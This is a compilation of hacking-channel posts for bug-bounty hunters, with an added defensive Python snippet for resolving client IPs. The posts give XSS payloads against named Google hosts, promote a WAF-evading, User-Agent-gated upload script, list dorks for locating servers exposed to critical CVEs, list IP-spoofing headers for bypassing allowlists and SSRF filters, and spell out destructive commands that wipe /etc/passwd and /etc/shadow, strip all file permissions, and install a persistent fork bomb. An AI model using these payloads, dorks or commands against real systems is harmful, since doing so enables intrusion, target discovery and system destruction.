Hey Hunters,
DarkShadow here again. We all know how frustrating it is to test file upload vulnerabilities—sometimes the file uploads, but you can’t execute it because WAFs or IDS jump in.
So, I’ve built a next-level, compact noscript that actually bypasses most WAF and IDS protections. It uses 3 stealth techniques to evade restrictions and offers 2 output modes for flexibility.
What makes it even cooler?
No password needed.
It uses a unique auth mechanism based on the User-Agent header—no login form, no cookies, nothing else. If your User-Agent matches, you’re in. If not, the noscript won’t even respond.
Wanna try it out? Drop a comment and let me know. And of course, follow me on X → DarkShadow
#wafbypass
Hey Hunters,
DarkShadow here back again. Dropping a Google XSS POC1😁
✅POC steps:
Vuln host: aihub.cloud.google.com
Vuln param: /url?q= (GET method)
Technique: double URL encoding
Payload: "><noscript/onload=alert(document.domain)>
A simple XSS payload as usual😏
The vulnerability has been patched🥱
Don't forget to follow me 👉🏼 DarkShadow
#xss #poc #googlebug
⚡WaybackLister is a reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings. It's fast, multithreaded, and built for practical use in security assessments and bug bounty recon.
✅http://github.com/anmolksachan/wayBackLister
✅ Join Telegram For More Content: t.me/brutsecurity
----------------------------------------------------------
🎓 Ready to Skill Up? Enroll Now → wa.link/brutsecurity
#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
CVE-2025-27007: Privilege Escalation in OttoKit WordPress Plugin, 9.8 rating 🔥
Errors in the logic of the plugin's API could potentially lead to an attacker gaining access to the administrator account. According to Patchstack, exploitation of the vulnerability began just an hour after public disclosure!
Search at Netlas.io:
👉 Link: https://nt.ls/y4FXX
👉 Dork: http.body:"plugins/suretriggers"
Read more: https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
Good morning hackers 🥱
Need more Google bug POC's? 😁
🔥Sensitive information leaks via Fofa dorking 💥
Hey Hunters, DarkShadow back again, dropping a simple and effective dork.
Leaking firebase configurations👀
Fofa query:
body="firebaseapp" && domain="example.com"
Or
(body="firebaseapp" || body="firebaseconfig") && host=".target_domain_name_only"
If you guys really enjoy reading my methodologies, don't forget to follow me 👉🏼 DarkShadow
#dork #bugbountytips
Guys, read this HackerOne report to know how to exploit further using this sensitive information.
https://hackerone.com/reports/1447751
Hey Hunters,
Dark Shadow here back again. Dropping a Google XSS POC-2😁
✅POC steps:
•Vuln host: books.google.com
•Xss type: stored based XSS
•Vuln param: book name noscript and publisher name parameter.
•Technique: inject the payload directly, without any kind of encoding. (Reason: no input sanitization)
Payload: "><noscript/onload=prompt(1)>
A simple payload can flip the game if you use it in the right place.😁
The vulnerability has been patched🥱
Let me know—aren’t you all interested to know that Google rewarded $31,337 for an SSRF vulnerability?
And
Don't forget to follow me 👉🏼 DarkShadow
#xss #googlebug
CVE-2025-20188: Use of Hard-coded Credentials in Cisco IOS XE, 10.0 rating 🔥🔥🔥
Due to hard-coded JWT, Cisco IOS XE instances may be vulnerable to arbitrary file uploads, path traversal, and arbitrary command execution. Catalyst controllers are primarily affected.
Search at Netlas.io:
👉 Link: https://nt.ls/BKkJI
👉 Dork: certificate.issuer_dn:"IOS-Self-Signed-Certificate"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC
Hey Hunters,
If you're facing difficulties setting up Kali NetHunter, then Proot-Distro is a powerful and user-friendly alternative. It offers an easy and comprehensive solution for running multiple Linux distributions directly in Termux—no root required.
Explore it on GitHub:
https://github.com/termux/proot-distro
Hey Hunters
DarkShadow here — back again with some killer techniques most bug bounty hunters overlook.
IP Spoofing Headers for Bypass & Testing:
X-Forwarded-For: 127.0.0.1
# Trusted by proxies/load balancers
X-Real-IP: 127.0.0.1
# Common in NGINX setups
X-Client-IP: 127.0.0.1
# Used for rate limiting/tracking
X-Remote-IP: 127.0.0.1
# May influence backend logic
X-Remote-Addr: 127.0.0.1
# Tries to override remote IP
True-Client-IP: 127.0.0.1
# Used by CDNs (e.g. Akamai)
CF-Connecting-IP: 127.0.0.1
# Cloudflare real IP header
Fastly-Client-IP: 127.0.0.1
# Fastly CDN client IP
X-Cluster-Client-IP: 127.0.0.1
# Seen in clustered environments
Forwarded: for=127.0.0.1
# RFC standard version of XFF
X-Originating-IP: 127.0.0.1
# Used by mail servers & legacy apps
X-Forwarded-Host: 127.0.0.1
# Can affect virtual host routing
X-Forwarded-Server: 127.0.0.1
# Backend routing logic
X-Real-Hostname: localhost
# Tries to spoof internal host
Via: 127.0.0.1
# May appear in proxy chains
Forwarded-For: 127.0.0.1
# Non-standard but seen in wild
Proxy-Client-IP: 127.0.0.1
# Java-based servers (Tomcat)
WL-Proxy-Client-IP: 127.0.0.1
# WebLogic-specific header
Use: Bypass IP whitelisting, rate limits, geo-blocks, SSRF filters, or trigger internal behavior. Combine multiple for better results in black-box testing.
Don't forget to follow me 👉🏼 DarkShadow
#bugbountytips #wafbypass
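Defender's view of the header list above, as an added example that is not part of the original post: the application takes the client address from the socket peer unless that peer is one of its own proxies, and logs requests from untrusted peers that claim an internal address. The proxy range, function names and sample addresses are assumptions made for this sketch.

```python
import ipaddress

# Assumption: our own reverse proxies live in this (constructed) range.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]
# Single-address client-IP headers taken from the list in the post.
IP_HEADERS = {"x-forwarded-for", "x-real-ip", "x-client-ip", "x-remote-ip",
              "x-remote-addr", "true-client-ip", "cf-connecting-ip",
              "fastly-client-ip", "x-cluster-client-ip", "x-originating-ip",
              "forwarded-for", "proxy-client-ip", "wl-proxy-client-ip"}

def is_trusted(addr):
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)

def resolve_client_ip(peer, headers):
    """Address to use for allowlists and rate limits (hypothetical helper)."""
    if not is_trusted(peer):
        return peer  # direct client: every forwarding header is client-controlled
    xff = {k.lower(): v for k, v in headers.items()}.get("x-forwarded-for", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    # Our proxies append on the right, so the first untrusted hop from the
    # right is the real client; everything left of it is client-supplied.
    for hop in reversed(hops):
        if not is_trusted(hop):
            try:
                return str(ipaddress.ip_address(hop))
            except ValueError:
                return peer  # malformed entry: fall back to the socket peer
    return peer

def suspicious_headers(peer, headers):
    """Header names to log: internal addresses claimed by an untrusted peer."""
    if is_trusted(peer):
        return []
    hits = set()
    for name, value in headers.items():
        if name.lower() not in IP_HEADERS:
            continue
        for part in value.split(","):
            try:
                ip = ipaddress.ip_address(part.strip())
            except ValueError:
                continue
            if ip.is_loopback or ip.is_private:
                hits.add(name)
    return sorted(hits)
```

The same rule belongs at the edge: the proxy should overwrite or strip these headers on ingress so the application never sees client-supplied values.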
This is not for hacking, this is for hackers;
If you still haven't found anything in your bug hunting, then first apply this code in your file:
while(!success){
tryagain();
if(tried)
break;
}
Never give up, you just need to change your mindset.
Remember, where everyone gives up, the pros started there😌
⚠️Don't try these DarkShadow commands:
Just dropping some of DarkShadow's bash nuclear demo commands🚨
1️⃣👉🏼Overwrite /etc/passwd and /etc/shadow
echo "" > /etc/passwd
echo "" > /etc/shadow
Destroys all user accounts, including root.
Result: Nobody can log in anymore — system is fcked.
2️⃣👉🏼Make the system unusable (chmod all permissions)
chmod -R 000 /
Remove all permissions (read/write/execute) from all files and folders.
Result: You can't even ls or log in properly. Full chaos.
3️⃣👉🏼Persistent Fork Bomb (auto start even after reboot)
echo ':(){ :|:& };:' >> ~/.bashrc
or for all users:
echo ':(){ :|:& };:' >> /etc/bash.bashrc
Adds the fork bomb into startup files (.bashrc or /etc/bash.bashrc).
Result: As soon as anyone logs in, the machine crashes.
Hard to recover unless you boot into recovery mode and manually edit.
ShodanX⚡️– A terminal-powered recon and OSINT tool built on top of the Shodan services to gather information about targets using Shodan dorks ✨
✅Link - https://github.com/RevoltSecurities/Shodanx
👀 @mrz_0047
#BugBounty #cybersecurity #infosec #shodan